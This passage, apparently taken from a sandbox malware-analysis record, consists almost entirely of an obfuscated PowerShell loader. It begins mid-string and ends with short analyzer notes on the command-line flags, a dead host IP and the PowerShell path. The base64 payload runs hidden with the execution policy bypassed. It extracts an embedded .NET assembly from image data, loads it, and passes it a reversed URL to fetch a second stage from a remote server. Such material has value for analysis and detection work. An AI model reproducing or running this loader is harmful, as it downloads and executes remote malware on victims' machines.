Q⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
dead_host 45.88.66.43:80
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe